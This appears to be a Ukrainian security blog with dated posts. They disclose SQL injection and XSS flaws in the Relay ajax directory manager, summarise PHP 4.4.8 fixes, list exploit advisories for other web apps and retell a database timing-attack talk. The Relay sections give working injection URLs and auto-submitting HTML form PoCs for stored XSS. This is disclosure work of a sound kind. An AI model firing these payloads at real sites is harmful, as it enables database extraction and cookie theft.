Websecurity - Веб безпека

Нещодавно я вже писав про уразливості в Relay. І два дні тому, 20.01.2008, я знайшов нові SQL Injection та Cross-Site Scripting уразливості у веб додатку Relay (ajax directory manager).

SQL Injection:

http://site/relay/management/index.php?page=manage&module=users&action=details&uid=-1%20or%20id=1
http://site/relay/management/index.php?page=manage&module=users&action=details&uid=1%20and%20substring(username,1,1)=char(109)

http://site/relay/management/index.php?page=manage&module=clients&action=details&cid=-1%20or%20id=1
http://site/relay/management/index.php?page=manage&module=clients&action=details&cid=1%20and%20substring(version(),1,1)=3

XSS:

http://site/relay/management/index.php?page=manage&module=users&action=details&uid=%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/relay/management/index.php?page=manage&module=clients&action=details&cid=%3Cscript%3Ealert(document.cookie)%3C/script%3E

XSS (Persistent):

http://site/relay/relay.php?relay=getFile&fileid=-1%20or%201=1/*%3Cscript%3Ealert(document.cookie)%3C/script%3E

Уразливість в логах, де зберігається інформація про файли, які були скачені. При перегляді логів адміном на сторінці http://site/relay/management/index.php?page=stats&module=gen& action=latest XSS код буде виконано.

Вразлива версія Relay beta 1.0 (та попередні версії). Про уразливості розробникам веб додатка я повідомлю найближчим часом.

На початку місяця, 03.01.2008, вийшов PHP 4.4.8, у якому виправлено багато помилок та уразливостей. Даний реліз направлений на покращення безпеки та стабільності гілки 4.4.x (котра вже не розвивається і випуск секюріті оновлень буде припинено 8 серпня цього року).

Серед секюріті покращень та виправлень в PHP 4.4.8:

• Покращене виправлення для MOPB-02-2007.
• Виправлене цілочислене переповнення буферу в chunk_split().
• Виправлене цілочислене переповнення буферу в str[c]spn().
• Виправлена регресія в glob при вімкненому open_basedir (що з’явилася після фікса бага #41655).
• Виправлена money_format(), що не приймала багатократні токени %i та %n.
• Додана “max_input_nesting_level” опція в php.ini для обмеження рівнів вкладенності вхідних змінних. Виправлення для MOPB-03-2007.
• Виправлена INFILE LOCAL опція при роботі з MySQL - щоб не дозволяти при активному open_basedir чи safe_mode.
• Виправлені session.save_path та error_log значення, що будуть перевірятися стосовно open_basedir та safe_mode.

По матеріалам http://www.php.net.

25.08.2007

У лютому, 22.02.2007, я знайшов Cross-Site Scripting уразливість на проекті http://poshuk.com. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливість з’явиться пізніше.

22.01.2008

XSS:

• alert(document.cookie)
• цікавий
• html включення

Дана уразливість досі не виправлена.

В даній добірці експлоіти в веб додатках:

• MultiCart 1.0 Remote Blind SQL Injection Exploit (деталі)
• Poppawid 2.7 (form) Remote File Inclusion Vulnerability (деталі)
• Ossigeno CMS <= 2.2a3 (footer.php) Remote File Inclusion Vulnerability (деталі)
• Web Template Management System 1.3 Remote SQL Injection (деталі)
• Furkan Tastan Blog Remote SQL Injection Vulnerability (деталі)
• Trionic Cite CMS <= 1.2rev9 Remote File Inclusion Vulnerability (деталі)
• Picturesolution <= v2.1 (config.php path) Remote File Inclusion Vuln (деталі)
• CMS Creamotion (securite.php) Remote File Inclusion Exploit (деталі)
• ELSE IF CMS 0.6 Multiple Remote Vulnerabilities / Exploit (деталі)
• JGBBS 3.0beta1 Version Search.ASP “Author” SQL Injection Exploit (деталі)

Продовжуючи тему Безпеки IPB, розповім вам про нові уразливості та експлоіти до Invision Power Board.

Ось самий останній експлоіт для IPB 2.1.7 та попередніх версій движка:

• Invision Power Board <= 2.1.7 ACTIVE XSS/SQL Injection Exploit (деталі)

Виявлений вихід за межі каталогу через WebDav в Apache Tomcat (directory traversal).

Можливе одержання файлів по абсолютному шляху через DAV-запрос LOCK.

• Apache Tomcat File Disclosure (Exploit) (деталі)

В даній добірці уразливості в веб додатках:

• SAXON version 5.4 XSS Attack Vulnerability (деталі)
• teatro 1.6 ( basePath ) Remote File Include Vulnerability (деталі)
• TikiWiki Remote PHP Code Evaluation Vulnerability (деталі)
• New elinks packages fix information disclosure (деталі)
• ESupport Multiple HTML Injection Vulnerabilities (деталі)
• MediaWiki Cross-site Scripting (деталі)
• XLAtunes 0.1 (album) Remote SQL Injection Vulnerability (деталі)
• New links2 packages fix arbitrary shell command execution (деталі)
• Vulnerability in com_categories in Joomla! (деталі)
• PHP-інклюдинг в PhpLeague (деталі)
• Міжсайтовий скриптінг і SQL-ін’єкція в Messageriescripthp (деталі)
• Multiple vulnerabilities in Joomla! (деталі)
• SQL injection vulnerability in Neocrome Land Down Under (LDU) (деталі)
• File Upload Manager <= 1.0.6 (detail.asp) Remote SQL Injection Exploit (деталі)
• SQL-ін’єкція в jclarens (деталі)

Фахівці компанії Core Security Technologies ще влітку на конференції Black Hat продемонстрували новий тип атаки на комерційні бази даних, за допомогою якої зловмисники зможуть одержувати з баз даних закриту інформацію, причому в самій системі керування базами даних чи у сполучному програмному забезпеченні може і не бути яких-небудь уразливостей.

Під час демонстрації уразливості фахівці компанії заявили, що в даному випадку використовується так звана атака таймінга, техніка застосовувана для взлому багатьох криптографічних систем. Нова атака ефективно працює проти алгоритму Btree, використовуваного для створення індексів майже у всіх популярних СУБД, наприклад у MySQL чи Oracle.

“На сьогодні загрози безпеки стосуються в основному помилок у програмному забезпеченні чи невірній конфігурації мережевого оточення і додаткового сполучного програмного забезпечення, тому зловмисники можуть одержати доступ до даних, так чи інакше обійшовши систему авторизації й аутентифікації” - говорять у Core Security.

Новий же тип атак цілком покладається на спадкоємні характеристики алгоритмів індексування даних. У криптографії, атаки, що використовують метод таймінга, являють собою спеціальну техніку, коли нападник аналізує час, витрачений програмою на виконання криптографічного алгоритму.

Далі, за допомогою статистичних даних про швидкість роботи усіх використовуваних алгоритмів хакер з відкритих джерел одержує інформацію про те, який алгоритм використовується (на підставі даних за часом), а також яка саме криптографічна система розгорнута. Після чого, робота зловмисника зводиться до виявлення готових експлоітів для зв’язки алгоритм шифрування - програма шифрування, або до створення власного “ключа” для цього алгоритму, що більш складно, але і більш ефективно.

У випадку з базами даних підхід той же. Зловмисник, що бажає, наприклад, одержати закриті дані з БД якого-небудь сайта, заходить на цей сайт, після чого робить тестові виміри часу виконання команди Insert, що відповідає за додавання даних у БД. Зробити це можна масою способів, наприклад, написавши у форумі сайта повідомлення різної довжини. Далі порівнюються дані вставки малого і великого обсягу даних. У результаті тимчасових вимірів (таймінга) у зловмисника з’являються дані про використовувану СУБД і її версію. Ще більш ефективний метод таймінга у випадку одночасної вставки даних різного обсягу.

В результаті одержання даних про час виконання, можна буде одержати інформацію про структуру даних і дерево індексів СУБД, після чого задача зловмисника по одержанню закритих даних багаторазово спрощується. Ще одна небезпека даного методу в тім, що виявити дану атаку при активному відвідуванні сайта практично неможливо, тому що крім зловмисника з даними активно працюють і легітимні користувачі.

По матеріалам http://www.secblog.info.

29.10.2007

У травні, 26.05.2007, я знайшов SQL Injection та Cross-Site Scripting уразливості у веб додатку Relay (ajax directory manager).

Деталі уразливості з’являться пізніше, спочатку повідомлю розробникам веб додатка.

20.01.2008

SQL Injection:

http://site/relay/relay.php?relay=getFile&fileid=-1%20or%20id=1151513788
http://site/relay/relay.php?relay=getFile&fileid=1151513788%20and%20substring(version(),1,1)=3

XSS (Persistent):

На сторінці http://site/relay/relay.html

<img src='' onerror='javascript:alert(document.cookie)'>В полі: name.

PoC:

relay XSS.html

<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/relay/relay.php" method="post">
<input type="hidden" name="relay" value="setMeta">
<input type="hidden" name="fileid" value="1151513788">
<input type="hidden" name="filename" value="relay bird.jpg<img src='' onerror='javascript:alert(document.cookie)'>">
<input type="hidden" name="description" value="">
<input type="hidden" name="flags" value="normal">
</form>
</body>

На сторінці http://site/relay/relay.html

</textarea><img src='' onerror='javascript:alert(document.cookie)'>В полі: description.

PoC:

relay XSS2.html

<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/relay/relay.php" method="post">
<input type="hidden" name="relay" value="setMeta">
<input type="hidden" name="fileid" value="1151513788">
<input type="hidden" name="filename" value="relay bird.jpg">
<input type="hidden" name="description" value="</textarea><img src='' onerror='javascript:alert(document.cookie)'>">
<input type="hidden" name="flags" value="normal">
</form>
</body>

XSS:

На сторінці http://site/relay/relay.html

<img src='' onerror='javascript:alert(document.cookie)'>В полі: searchbar.

Вразлива версія Relay beta 1.0. Для виконання SQL Injection необхідно мати акаунт в системі (будь-то акаунт адміна чи користувача). А XSS уразливості можуть бути використані проти усіх користувачів системи.

В даній добірці експлоіти в веб додатках:

• MDPro 1.0.76 Remote SQL Injection Exploit (деталі)
• mxBB Module mx_glance 2.3.3 Remote File Include Vulnerability (деталі)
• phpBB Mod OpenID 0.2.0 BBStore.php Remote File Inclusion Vuln (деталі)
• actSite 1.991 Beta (base.php) Remote File Inclusion Vulnerability (деталі)
• actSite 1.56 (news.php) Local File Inclusion Vulnerability (деталі)
• php wcms XT 0.0.7 Multiple Remote File Inclusion Vulnerabilities (деталі)
• Segue CMS <= 1.8.4 index.php Remote File Inclusion Vulnerability (деталі)
• PHP-Fusion module Expanded Calendar 2.x SQL Injection Exploit (деталі)
• smbftpd 0.96 SMBDirList-function Remote Format String Exploit (деталі)
• PHP-Nuke POST crossite scripting PoC (деталі)